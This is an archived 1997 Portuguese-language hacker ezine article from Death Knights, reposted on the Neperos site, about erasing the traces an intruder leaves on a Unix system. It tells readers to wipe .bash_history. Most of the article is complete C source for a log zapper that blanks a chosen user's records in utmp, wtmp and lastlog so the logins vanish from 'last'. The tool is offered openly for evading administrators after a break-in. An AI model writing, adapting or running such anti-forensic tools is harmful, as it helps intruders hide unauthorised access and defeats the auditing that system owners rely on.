Neperos
SIGN IN
Copy Link
Add to Bookmark
Report

Apagando LOGS!!

Death Knights Issue 0

eZine's profile picture
eZine lover (@eZine)
Published in 
Death Knights
 · 2 years ago

by SaTaNfAcE

Esta parte eh muito util para apagar os rastros deixados no sistema por qualquer usuario. A primeira coisa q deve-se fazer eh voce apagar o conteudo do arquivo /home/user/.bash_history. Esse arquivo loga todos os comando executados pelo usuario durante sua permanencia no sistema!! Vc tb fica loado no WTMP, UTMP e LASTLOG que pode ser visualizado pelo root pelo comando last user.

Aih vai um prg em C com finalidade de apagar esses logs!!

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx------- 

############################# 
##   Copyright (c) 1997    ## 
##    The Death Knights    ## 
############################# 

#include <sys/types.h> 
#include <stdio.h> 
#include <unistd.h> 
#include <sys/file.h> 
#include <fcntl.h> 
#include <utmp.h> 
#include <pwd.h> 
#include <lastlog.h> 
#define WTMP_NAME "/usr/adm/wtmp" 
#define UTMP_NAME "/etc/utmp" 
#define LASTLOG_NAME "/usr/adm/lastlog" 

int f; 

void kill_utmp(who) 
char *who; 
{ 
    struct utmp utmp_ent; 

  if ((f=open(UTMP_NAME,O_RDWR))>=0) { 
     while(read (f, &amp;utmp_ent, sizeof (utmp_ent))> 0 ) 
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { 
                 bzero((char *)&amp;utmp_ent,sizeof( utmp_ent )); 
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR); 
                 write (f, &amp;utmp_ent, sizeof (utmp_ent)); 
            } 
     close(f); 
  } 
} 

void kill_wtmp(who) 
char *who; 
{ 
    struct utmp utmp_ent; 
    long pos; 

    pos = 1L; 
    if ((f=open(WTMP_NAME,O_RDWR))>=0) { 

     while(pos != -1L) { 
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND); 
        if (read (f, &amp;utmp_ent, sizeof (struct utmp))<0) { 
          pos = -1L; 
        } else { 
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) { 
               bzero((char *)&amp;utmp_ent,sizeof(struct utmp )); 
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND); 
               write (f, &amp;utmp_ent, sizeof (utmp_ent)); 
               pos = -1L; 
          } else pos += 1L; 
        } 
     } 
     close(f); 
  } 
} 

void kill_lastlog(who) 
char *who; 
{ 
    struct passwd *pwd; 
    struct lastlog newll; 

     if ((pwd=getpwnam(who))!=NULL) { 

        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) { 
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 
0); 
            bzero((char *)&amp;newll,sizeof( newll )); 
            write(f, (char *)&amp;newll, sizeof( newll )); 
            close(f); 
        } 

    } else printf("%s: ?\n",who); 
} 

main(argc,argv) 
int argc; 
char *argv[]; 
{ 
    if (argc==2) { 
        kill_lastlog(argv[1]); 
        kill_wtmp(argv[1]); 
        kill_utmp(argv[1]); 
        printf("Zap2!\n"); 
    } else 
    printf("Error.\n"); 
} 

-------xX !!! CuT HeRe !!! !!! CuT HeRe !!! !!! CuT HeRe !!! Xx-------

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
It was brought to my attention that there’s a mistake as this article appears to be empty. Unfortunately, it’s not a mistake. The first i ...
eZine's profile picture
eZine lover (@eZine)
22 Nov 2024
Thanks for the comment. I'm glad to know that my archiving work is useful to someone! You can find more ezines by checking out my profi ...
guest's profile picture
@guest
21 Nov 2024
I can't believe you archived it! Chronicles of Chaos was my favorite online magazine back in the day.
lostcivilizations's profile picture
Lost Civilizations (@lostcivilizations)
21 Nov 2024
Thank you very much for your comment. I haven’t read the book by Hakan Öniz and didn’t know the Shardana could have traveled so far as to re ...
guest's profile picture
@guest
20 Nov 2024
Shardana or Sheridan are the sea peoples who arrive in Eire or Ireland and also move into Scotland
Adelaide's profile picture
@Adelaide
20 Nov 2024
È buono
guest's profile picture
@guest
20 Nov 2024
TODAY IT-S FREEZING. UNFORTUNATELY I NEED TO GO TO THE OFFICE! WHAT ABOUT YOU?
guest's profile picture
@guest
19 Nov 2024
reading Birmingham I thought that it was the city in UK :D
guest's profile picture
@guest
19 Nov 2024
are they made all year or typical of a special occasion?
guest's profile picture
@guest
19 Nov 2024
Deliziosa!!!!!Assolutamente da provare questa domenica! Grazie per l'idea :D
a Francesco Arca production 2016 - 2024
Terms of Service - Privacy Policy
neperos on mastodon
Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT